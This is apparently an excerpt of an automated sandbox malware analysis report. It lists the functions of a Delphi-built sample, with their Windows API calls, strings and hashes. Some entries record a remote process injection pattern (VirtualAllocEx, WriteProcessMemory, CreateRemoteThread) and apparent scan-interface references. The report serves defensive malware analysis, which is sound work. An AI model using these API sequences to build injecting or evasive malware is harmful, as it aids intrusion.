                                                                • Instruction ID: 4409a88e8f2521c788d60cf9b3b175c281d8acc22934e0ec4ae016b11edd0eaa
                                                                • Opcode Fuzzy Hash: 308d68aa1d156c91315cdba5e08fdee3d25c5c621d691da675b93fca1bd028c3
                                                                • Instruction Fuzzy Hash: F9419D7ED41286DFDB24FF6CD04836937E1EB09314F54481AD808C7281DB749899CB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02895974 Relevance: 3.1, APIs: 2, Instructions: 97networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • InternetCloseHandle.WININET(028DD4D0), ref: 02895A6F
                                                                • InternetCloseHandle.WININET(028DD4CC), ref: 02895A8F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleInternet
                                                                • String ID:
                                                                • API String ID: 1081599783-0
                                                                • Opcode ID: bec58dcabbd9f8c29394044318ccc38a740898aaecf860969973f90f8e6beee9
                                                                • Instruction ID: cbe2c4e25306aa05c95f7911c270a7b716ee62257b9cfcda4acde05bbe4c0761
                                                                • Opcode Fuzzy Hash: bec58dcabbd9f8c29394044318ccc38a740898aaecf860969973f90f8e6beee9
                                                                • Instruction Fuzzy Hash: 8931813E7843406FFB16EA68DC51B1537AAE748B00F958861F100D7680D6B87C28CA19
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028833C4 Relevance: 3.1, APIs: 2, Instructions: 61fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 028833EE
                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 028833F5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastRead
                                                                • String ID:
                                                                • API String ID: 1948546556-0
                                                                • Opcode ID: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction ID: 77ea0516b2219819af9f276c1915614266a2595a53417765a304c4015dd4616c
                                                                • Opcode Fuzzy Hash: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction Fuzzy Hash: A2111679705158EFDB44EFA9D940A5EBBE9EF58654B20C0A6E808DB204E730EE01DB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028833C2 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 028833EE
                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 028833F5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastRead
                                                                • String ID:
                                                                • API String ID: 1948546556-0
                                                                • Opcode ID: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction ID: 8877178d495a49277c7ad83b27cf231ee5f5e902b2e57eb190bb9309b1b5858c
                                                                • Opcode Fuzzy Hash: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction Fuzzy Hash: 8FF05479704118BFD744EAAEDC84F6ABBECDF54660B108466F808CB100E670DD00C671
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288CAAE Relevance: 3.0, APIs: 2, Instructions: 34libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 0288CABA
                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0288CB04,?,00000000,0288CB22), ref: 0288CAE9
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorLibraryLoadMode
                                                                • String ID:
                                                                • API String ID: 2987862817-0
                                                                • Opcode ID: 5055617b318c59eb6e08be5892213fded5ef2cf24447395aa51b1f7d81a7e408
                                                                • Instruction ID: 2f01f361a6d7ffb31e12c3bbbe236e82a2a524c70ffc2f8185da5a5359f871fa
                                                                • Opcode Fuzzy Hash: 5055617b318c59eb6e08be5892213fded5ef2cf24447395aa51b1f7d81a7e408
                                                                • Instruction Fuzzy Hash: 2EF05E78614B04BEEB156F798C5182ABBADEB49B2074248B1F810E2650E6389C10C961
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288CAB0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 0288CABA
                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0288CB04,?,00000000,0288CB22), ref: 0288CAE9
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorLibraryLoadMode
                                                                • String ID:
                                                                • API String ID: 2987862817-0
                                                                • Opcode ID: 8a65d90dea326e95537bd673f64563c26475c99897dcaaef1f295e4bf05bfaef
                                                                • Instruction ID: 8a126b36dcaf7ec40d767f20178c9210802edae5517f85cb3adf778ad41f2604
                                                                • Opcode Fuzzy Hash: 8a65d90dea326e95537bd673f64563c26475c99897dcaaef1f295e4bf05bfaef
                                                                • Instruction Fuzzy Hash: CEF0827C614B04BEEB156F758C5182BBBADEB4DB2074248B1E810E2650E63C5810C971
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02885AA8 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(02A21B20,?,00000105), ref: 02885AC6
                                                                  • Part of subcall function 02885D0C: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02885D28
                                                                  • Part of subcall function 02885D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885D46
                                                                  • Part of subcall function 02885D0C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885D64
                                                                  • Part of subcall function 02885D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02885D82
                                                                  • Part of subcall function 02885D0C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02885E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02885DCB
                                                                  • Part of subcall function 02885D0C: RegQueryValueExA.ADVAPI32(?,02885F78,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02885E11,?,80000001), ref: 02885DE9
                                                                  • Part of subcall function 02885D0C: RegCloseKey.ADVAPI32(?,02885E18,00000000,00000000,00000005,00000000,02885E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885E0B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                • String ID:
                                                                • API String ID: 2796650324-0
                                                                • Opcode ID: c46c9e0c1438972d555a7182d0a40b5e5deff50c3ea7bcdaad24a88d7c2063ac
                                                                • Instruction ID: 18753a13985137900a6114550576f283d8e24704ea9fff2414c9f947513c1552
                                                                • Opcode Fuzzy Hash: c46c9e0c1438972d555a7182d0a40b5e5deff50c3ea7bcdaad24a88d7c2063ac
                                                                • Instruction Fuzzy Hash: 17E06D79A002148BCB10EE5CC8C4B4B77D8AB08750F410661EC58CF246D3B4EA248BD1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02888134 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(00000000,?,0289752B,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,ScanString,0289AD5C,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession), ref: 0288813F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: f1cd34be1106963965d99eca825f94d2eb1e2dbfef0024bf6ccd5ac3099b070d
                                                                • Instruction ID: e6d3a9589837726259f746342a716e9f0ce634f6f13e4070af61821ebe755f2a
                                                                • Opcode Fuzzy Hash: f1cd34be1106963965d99eca825f94d2eb1e2dbfef0024bf6ccd5ac3099b070d
                                                                • Instruction Fuzzy Hash: 53C08CAD3013040A1E60B1BC0CC4529038D49453383A01F61F03CC22D2EB15E0162811
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0289B0CC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • timeSetEvent.WINMM(?,00000000,0289B0C0), ref: 0289B0DC
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Eventtime
                                                                • String ID:
                                                                • API String ID: 2982266575-0
                                                                • Opcode ID: bc77cbcb3fbbd22707dab39149af504eec09daa3d68b3895757671d68eab147a
                                                                • Instruction ID: 56a140ac7c2cd73f13cc7b12b32cdc427754f6e9bba938225fa9ca0c922cedb2
                                                                • Opcode Fuzzy Hash: bc77cbcb3fbbd22707dab39149af504eec09daa3d68b3895757671d68eab147a
                                                                • Instruction Fuzzy Hash: A8C092FD7853003AFA20A6B92CC2F23228DE704B01F200812B700EF6C1E2E25C644668
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288CB0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32(?,0288CB29), ref: 0288CB1C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 747a8ddb91acde9d673c5fe3d1e21f0bc0e22368f899b669e034463e6d3fbbc6
                                                                • Instruction ID: 4db9739042bb2b0b494a1401656f4712dd6e25b3bc7ce599747972a4efc4357f
                                                                • Opcode Fuzzy Hash: 747a8ddb91acde9d673c5fe3d1e21f0bc0e22368f899b669e034463e6d3fbbc6
                                                                • Instruction Fuzzy Hash: 85B09B7EE0C6005EB70DABD5BC1141863E8D7C87207D144A7E004C3540D53854014524
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028815FC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 02881612
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: b68ee8f3a57e6ffed19771163ed15bec8e1f74ed3797bd11de2cf1d8f19b8eff
                                                                • Instruction ID: 5b7a0af200d961b05508a0f25b1211baca00728c8168ecb3f07135c4a6ce7b7a
                                                                • Opcode Fuzzy Hash: b68ee8f3a57e6ffed19771163ed15bec8e1f74ed3797bd11de2cf1d8f19b8eff
                                                                • Instruction Fuzzy Hash: F2F049F8B423004FDB09DF799AA47027BE2E789304F208479D249DB3C8EB75840A8B44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028816B2 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028816D4
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 8a2d550e409c24f3318c61c2681c8b65a1f2d56b2ae0c9bd79c7675f976cc17e
                                                                • Instruction ID: 49f18034b09e60b8f107484640ab2f34f2d1341880eaeec8ef8cf85860cf83a2
                                                                • Opcode Fuzzy Hash: 8a2d550e409c24f3318c61c2681c8b65a1f2d56b2ae0c9bd79c7675f976cc17e
                                                                • Instruction Fuzzy Hash: F8F090BAB417556FD710AE5E9C84782BB94FB00321F11063AEA4CD7380D770A814CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02881716 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02881734
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                • Opcode ID: 7ec1eda71b77c240a485111faec2dac9846af938aed973abffa753b1c5c601b2
                                                                • Instruction ID: bdb4e8efcdbe869f40af1e3654ee26eb061c1f8a1566fff5aaad84cbe1c0e861
                                                                • Opcode Fuzzy Hash: 7ec1eda71b77c240a485111faec2dac9846af938aed973abffa753b1c5c601b2
                                                                • Instruction Fuzzy Hash: CCE0DFBD3003005FD710BABD4C887026B88AF49370F140A25F109DB2D2CB60D8018B60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 02893E60 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 75libraryloaderinjectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(0A74C085,00000000,00000123,00001000,00000040,?,028CD33C,?,?,02894314,?,00000000,028943E7,?,028CD33C,?), ref: 02893E80
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,0A74C085,00000000,00000123,00001000,00000040,?,028CD33C,?,?,02894314,?,00000000,028943E7,?,028CD33C), ref: 02893EC9
                                                                • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 02893ED6
                                                                • GetProcAddress.KERNEL32(00000000,ExitThread), ref: 02893EE5
                                                                • WriteProcessMemory.KERNEL32(0A74C085,00000000,?,00000123,?,?,00000000,00000000,ExitThread,00000000,LoadLibraryA,kernel32.dll,0A74C085,00000000,00000123,00001000), ref: 02893F0D
                                                                • CreateRemoteThread.KERNEL32(0A74C085,00000000,00000000,00000000,00000000,00000000,?), ref: 02893F21
                                                                • CloseHandle.KERNEL32(00000000,0A74C085,00000000,00000000,00000000,00000000,00000000,?,0A74C085,00000000,?,00000123,?,?,00000000,00000000), ref: 02893F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleProc$AllocCloseCreateMemoryModuleProcessRemoteThreadVirtualWrite
                                                                • String ID: ExitThread$LoadLibraryA$h$h$kernel32.dll
                                                                • API String ID: 3764795964-1073290800
                                                                • Opcode ID: b0df4b3ae983958c57853606da9c9dfef731ea29fb4f5ff99a978a86a9b4cfce
                                                                • Instruction ID: 454a21399aa930617a8c86ed0870ce016b4fe6bbad7867a2f0900cccb913745c
                                                                • Opcode Fuzzy Hash: b0df4b3ae983958c57853606da9c9dfef731ea29fb4f5ff99a978a86a9b4cfce
                                                                • Instruction Fuzzy Hash: F121CF792483046AE710EF598C41FAFB7EDDF85740F44842DF588EB280E674DA098BA7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02885E17 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99stringlibrarythreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02885E28
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02885E35
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02885E3B
                                                                • lstrlen.KERNEL32(00000000), ref: 02885E66
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02885EAD
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885EBD
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02885EE5
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885EF5
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885F1B
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                • String ID: .
                                                                • API String ID: 1599918012-248832578
                                                                • Opcode ID: f7c23e1ef3054c1fd46266f36354c33fd2b70c50cf1077f494caf2a312a5665e
                                                                • Instruction ID: 4c784733ee18e8b938d3ab535f34d06fa258431bc61cd5a006dc5ed1710f72dd
                                                                • Opcode Fuzzy Hash: f7c23e1ef3054c1fd46266f36354c33fd2b70c50cf1077f494caf2a312a5665e
                                                                • Instruction Fuzzy Hash: 4F31A97DE4021D29FF25E6B89C89FDE77AD8B04380F4501A19548E6180DB78DE858F52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02893F94 Relevance: 6.1, APIs: 4, Instructions: 107memoryinjectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 02893FF9
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00003000,00000040), ref: 0289400F
                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040,00000000,00000000,00008000,00000000,00000000,00003000,00000040), ref: 02894030
                                                                • WriteProcessMemory.KERNEL32(?,028DD31C,028DD31C,028DD320,028DD330,?,00000000,00000000,00003000,00000040,00000000,028940DA), ref: 02894092
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 2022580353-0
                                                                • Opcode ID: 304fec6253695c3d1ebb93f33bbd5a9cc50307d52d7a29d7ccecff327d028c3a
                                                                • Instruction ID: 758a272f6adcdeac367b2755375fde7dbfc18ae25faf90f3c8cad686ff997048
                                                                • Opcode Fuzzy Hash: 304fec6253695c3d1ebb93f33bbd5a9cc50307d52d7a29d7ccecff327d028c3a
                                                                • Instruction Fuzzy Hash: 56416A7EA41204AFEB58DB58C991F1A77E9EB48700F5844A8E500DB380E3B8A919CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02882EC8 Relevance: 27.1, APIs: 9, Strings: 9, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession), ref: 02882F02
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02882F0C
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02882F2B
                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession), ref: 02882F35
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02882F61
                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString), ref: 02882F6B
                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString), ref: 02882F93
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02882F9D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CharNext
                                                                • String ID: $ $ $"$"$"$"$"$"
                                                                • API String ID: 3213498283-3597982963
                                                                • Opcode ID: 11e796a4a99a176a6e10632bc722a34355527c19e277d3ec1598e00fd78350b5
                                                                • Instruction ID: 5116ae460dc253e8127c1479ed9d41e99729801cc38f6df5fc77be85fd82cbc6
                                                                • Opcode Fuzzy Hash: 11e796a4a99a176a6e10632bc722a34355527c19e277d3ec1598e00fd78350b5
                                                                • Instruction Fuzzy Hash: 1231BBFD6083D52EEB3335788CC83266DC54B4E754F0819E59D4ACB94FDBA84441C356
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0289411C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 67libraryloadersynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 0289413C
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02894142
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 02894154
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0289415A
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 0289416C
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02894172
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 028941BF
                                                                • GetExitCodeThread.KERNEL32(00000000,028CD33C,00000000,000000FF,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 028941C9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc$CodeExitObjectSingleThreadWait
                                                                • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32.dll
                                                                • API String ID: 3399263034-1503429014
                                                                • Opcode ID: dad34223c2012c6e0257eebce72917e4891c4499a440c30198eae8c4f458ad43
                                                                • Instruction ID: 9bfdbba66dc5410db1e404c506b41f52a40974655e0ae7d6d995a52f7a1d8216
                                                                • Opcode Fuzzy Hash: dad34223c2012c6e0257eebce72917e4891c4499a440c30198eae8c4f458ad43
                                                                • Instruction Fuzzy Hash: 43114FBCF403196BEF00BBA89C419AEBBBDEF58310F140575A525F7340EA7499018FA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02882560 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028828FE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Message
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                • API String ID: 2030045667-32948583
                                                                • Opcode ID: 30cb59bbf9f22f5e48c1ff5ebbbe29fb9c49c5222585e678f8ba1972ebc69468
                                                                • Instruction ID: 57cec31968adea82f82bf6bdcf9d847b153d52f1912b5fd3117bd46adebcef5a
                                                                • Opcode Fuzzy Hash: 30cb59bbf9f22f5e48c1ff5ebbbe29fb9c49c5222585e678f8ba1972ebc69468
                                                                • Instruction Fuzzy Hash: 4DA1F53CA042D88FDF21FA2CC884B98B6E5EB09714F1441E5DD4DDB28ACB759989CF52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02883154 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 028831DC
                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02883200
                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0288321C
                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 0288323D
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 02883266
                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 02883274
                                                                • GetStdHandle.KERNEL32(000000F5), ref: 028832AF
                                                                • GetFileType.KERNEL32(?,000000F5), ref: 028832C5
                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 028832E0
                                                                • GetLastError.KERNEL32(000000F5), ref: 028832F8
                                                                Memory Dump Source
